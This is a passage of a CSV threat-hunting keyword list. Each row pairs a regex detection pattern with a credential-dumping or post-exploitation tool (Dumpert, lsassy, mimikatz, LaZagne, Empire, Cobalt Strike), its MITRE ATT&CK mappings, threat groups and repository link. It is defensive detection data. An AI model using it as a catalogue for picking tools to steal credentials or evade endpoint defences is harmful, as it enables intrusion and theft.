Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_keepassx*",".{0,1000}dump_keepassx.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_lsass*",".{0,1000}dump_lsass.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*dump_lsass.js*",".{0,1000}dump_lsass\.js.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*dump_process(*lsass.exe*)*",".{0,1000}dump_process\(.{0,1000}lsass\.exe.{0,1000}\).{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*dump_sam(*",".{0,1000}dump_sam\(.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*dump_secrets.py*",".{0,1000}dump_secrets\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*dump_ssh_keys*",".{0,1000}dump_ssh_keys.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_tomcat*",".{0,1000}dump_tomcat.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_VAULT_INTERNET_EXPLORER*",".{0,1000}dump_VAULT_INTERNET_EXPLORER.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_VAULT_NGC_LOCAL_ACCOOUNT*",".{0,1000}dump_VAULT_NGC_LOCAL_ACCOOUNT.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_VAULT_WIN_BIO_KEY*",".{0,1000}dump_VAULT_WIN_BIO_KEY.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dump_webconf*",".{0,1000}dump_webconf.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_webpass*",".{0,1000}dump_webpass.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_wifi_wpa_*",".{0,1000}dump_wifi_wpa_.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_WPA-PBKDF2-PMKID_EAPOL.hashcat*",".{0,1000}dump_WPA\-PBKDF2\-PMKID_EAPOL\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dump_WPA-PMKID-PBKDF2.hashcat*",".{0,1000}dump_WPA\-PMKID\-PBKDF2\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*DumpAADSyncCreds.csproj*",".{0,1000}DumpAADSyncCreds\.csproj.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*DumpAADSyncCreds.exe*",".{0,1000}DumpAADSyncCreds\.exe.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*DumpAADSyncCreds.sln*",".{0,1000}DumpAADSyncCreds\.sln.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*DumpBrowserHistory*",".{0,1000}DumpBrowserHistory.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*DumpChromePasswords.ps1*",".{0,1000}DumpChromePasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - 
TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DumpCreds*",".{0,1000}DumpCreds.{0,1000}","offensive_tool_keyword","DumpCreds","Dumpcreds is a tool that may be used to extract various credentials from running processes. I just take a look at mimipenguin(https://github.com/huntergregal/mimipenguin) and tried to improve it a bit","T1055 - T1003 - T1216 - T1002 - T1552","TA0002 - TA0003 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/ponypot/dumpcreds","1","1","N/A","N/A","1","5","1","2019-10-08T07:26:31Z","2017-10-10T12:57:42Z" "*-DumpCreds*",".{0,1000}\-DumpCreds.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*dumpcreds*mimipenguin*",".{0,1000}dumpcreds.{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" 
"*dumpCredStore.ps1*",".{0,1000}dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Dumped LSASS memory to *",".{0,1000}Dumped\sLSASS\smemory\sto\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - 
T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*Dumpert*",".{0,1000}Dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Dumpert.bin*",".{0,1000}Dumpert\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*dumpert.dmp*",".{0,1000}dumpert\.dmp.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Dumpert.exe*",".{0,1000}Dumpert\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Dumpert.exe*",".{0,1000}Dumpert\.exe.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Dumpert.git*",".{0,1000}Dumpert\.git.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*dumpert.py*",".{0,1000}dumpert\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*dumpert_path=*",".{0,1000}dumpert_path\=.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*Dumpert-Aggressor*",".{0,1000}Dumpert\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Dumpert-Aggressor*",".{0,1000}Dumpert\-Aggressor.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*dumpertdll*",".{0,1000}dumpertdll.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*Dumpert-DLL*",".{0,1000}Dumpert\-DLL.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*-DumpForest *",".{0,1000}\-DumpForest\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*dumping passwords from %s 
(pid:*",".{0,1000}dumping\spasswords\sfrom\s\%s\s\(pid\:.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*DumpKernel-S1.ps1*",".{0,1000}DumpKernel\-S1\.ps1.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","1","N/A","10","8","N/A","N/A","N/A","N/A" "*dumplsass*",".{0,1000}dumplsass.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*dumpntlm.py*",".{0,1000}dumpntlm\.py.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*DumpNTLMInfo.py*",".{0,1000}DumpNTLMInfo\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*DumpPEFromMemory.cpp*",".{0,1000}DumpPEFromMemory\.cpp.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*DumpPEFromMemory.exe*",".{0,1000}DumpPEFromMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*DumpPEFromMemoryMemory.exe*",".{0,1000}DumpPEFromMemoryMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*DumpProcessByName*",".{0,1000}DumpProcessByName.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - 
